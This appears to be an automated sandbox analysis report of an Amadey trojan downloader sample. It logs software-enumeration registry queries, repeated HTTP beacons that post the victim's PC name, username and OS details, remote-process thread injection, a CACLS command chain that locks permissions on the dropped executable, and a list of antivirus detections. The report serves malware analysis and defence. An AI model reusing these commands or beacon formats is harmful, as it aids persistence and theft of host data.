1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x00000328
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
process gntuud.exe useragent
process mp3studios_97.exe useragent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2ce6e00,0x7fef2ce6e10,0x7fef2ce6e20
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1076,11771011546915947676,13004804993852951777,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1080 /prefetch:2
Time & API Arguments Status Return Repeated

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.50&sd=477325&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0
Process injection Process 2704 resumed a thread in remote process 2768
Process injection Process 2824 resumed a thread in remote process 3052
Process injection Process 2572 resumed a thread in remote process 2376
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002c4
suspend_count: 1
process_identifier: 2768
1 0 0

NtResumeThread

thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 3052
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0

NtResumeThread

thread_handle: 0x0000000000000118
suspend_count: 2
process_identifier: 2376
1 0 0
cmdline cmd /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit
cmdline CACLS "gntuud.exe" /P "test22:R" /E
cmdline CACLS "..\9c69749b54" /P "test22:N"
cmdline CACLS "..\9c69749b54" /P "test22:R" /E
cmdline CACLS "gntuud.exe" /P "test22:N"
Bkav W32.AIDetect.malware2
Lionic Trojan.Win32.Deyma.4!c
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
McAfee Artemis!369321F33D5F
Cylance Unsafe
VIPRE Gen:Variant.Lazy.158178
Sangfor Trojan.Win32.Save.a
Alibaba TrojanDownloader:Win32/Amadey.a5fd8235
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Lazy.D269E2
Cyren W32/Amadey.A.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Gen:Variant.Lazy.158178
MicroWorld-eScan Gen:Variant.Lazy.158178
Avast Win32:BotX-gen [Trj]
Ad-Aware Gen:Variant.Lazy.158178
Sophos Mal/Horst
FireEye Generic.mg.369321f33d5ffaee
Emsisoft Gen:Variant.Lazy.158178 (B)
SentinelOne Static AI - Malicious PE
Jiangmin TrojanDownloader.Deyma.akw
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Gridinsoft Trojan.Win32.Gen.bot
Microsoft Trojan:Win32/Amadey.PAB!MTB
GData Gen:Variant.Lazy.158178
Google Detected
AhnLab-V3 Malware/Win.Trojanspy.C5238800
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.36106.puW@amB2DIoi
ALYac Gen:Variant.Lazy.158178
MAX malware (ai score=84)
Malwarebytes Trojan.Amadey
TrendMicro-HouseCall TROJ_GEN.R002C0RL722
Rising Trojan.Generic@AI.100 (RDML:mMTw7NwLuqPivtIFNn7ejQ)
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Injector.EGTS!tr
AVG Win32:BotX-gen [Trj]
Cybereason malicious.33d5ff
Panda Trj/Genetic.gen